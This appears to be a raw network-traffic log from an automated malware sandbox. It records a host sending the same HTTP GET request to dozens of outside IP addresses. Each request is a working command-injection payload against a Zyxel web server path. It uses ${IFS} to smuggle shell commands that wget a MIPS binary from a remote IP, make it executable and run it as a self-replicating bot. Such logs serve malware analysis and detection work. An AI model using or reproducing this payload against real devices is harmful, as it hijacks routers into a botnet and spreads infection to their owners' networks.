                                      Jan 19, 2024 17:29:53.182681084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9442192.168.2.145981232.219.124.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182694912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9443192.168.2.1434076124.158.194.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182744980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9444192.168.2.145279273.232.61.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182765007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9445192.168.2.145877278.92.202.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182801008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9446192.168.2.144982854.39.245.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182847023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9447192.168.2.1442170153.61.85.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182900906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9448192.168.2.1460920192.41.93.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182941914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9449192.168.2.1445466149.222.1.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.182969093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9450192.168.2.1447364158.68.123.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183000088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9451192.168.2.1460446138.112.53.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183037043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9452192.168.2.145785048.51.82.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183098078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9453192.168.2.1454122188.235.84.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183144093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9454192.168.2.1441312177.22.230.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183193922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9455192.168.2.1456472128.128.146.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183227062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9456192.168.2.143588295.230.7.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183259964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9457192.168.2.1437372175.159.206.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183295965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9458192.168.2.1444872167.23.236.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183334112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9459192.168.2.1448324120.166.125.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183365107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9460192.168.2.1460722204.177.209.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183432102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9461192.168.2.1439198141.60.71.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183455944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9462192.168.2.144345413.98.110.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183494091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9463192.168.2.1460744217.189.31.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183522940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9464192.168.2.1455374108.87.88.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183579922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9465192.168.2.144296849.106.237.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183633089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9466192.168.2.145360273.175.8.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183672905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9467192.168.2.143388860.246.237.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183711052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9468192.168.2.1444594120.246.43.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183748007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9469192.168.2.1449560158.202.190.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183785915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9470192.168.2.144561669.163.130.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183832884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9471192.168.2.1451494151.59.25.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183859110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9472192.168.2.145494238.29.126.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183938980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9473192.168.2.1447180141.241.233.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183954000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9474192.168.2.145481897.40.116.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.183989048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9475192.168.2.1447192183.66.59.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184030056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9476192.168.2.1444108219.56.237.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184089899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9477192.168.2.1460674178.155.127.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184140921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9478192.168.2.1442672140.12.234.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184178114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9479192.168.2.1458868168.134.55.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184226036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9480192.168.2.144647496.65.101.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184279919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9481192.168.2.1446994143.99.3.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184309959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9482192.168.2.1439138199.225.214.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184350967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9483192.168.2.145905098.216.20.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184395075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9484192.168.2.143563625.153.72.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184453011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9485192.168.2.143885285.180.212.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184482098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9486192.168.2.143748866.50.1.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184529066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9487192.168.2.1448492119.151.10.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184586048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9488192.168.2.144175042.5.20.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184607029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9489192.168.2.1458596157.173.62.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184647083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9490192.168.2.1457930116.144.129.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184694052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9491192.168.2.1453896185.237.143.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184747934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9492192.168.2.143665284.147.98.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184772015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9493192.168.2.1434244217.80.163.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184824944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9494192.168.2.144702068.132.196.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184878111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9495192.168.2.144434499.181.238.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184912920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9496192.168.2.1443578206.187.6.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184945107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9497192.168.2.1457264176.65.206.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.184993029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9498192.168.2.144427032.101.8.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185044050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9499192.168.2.1440952163.5.44.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185082912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9500192.168.2.145794676.77.124.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185122967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9501192.168.2.1433894222.39.250.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185163021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9502192.168.2.14344829.93.245.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185215950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9503192.168.2.144225066.43.156.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185256004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9504192.168.2.1433902141.180.225.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:53.185301065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9505192.168.2.143509692.179.10.222443
                                      TimestampBytes transferredDirectionData
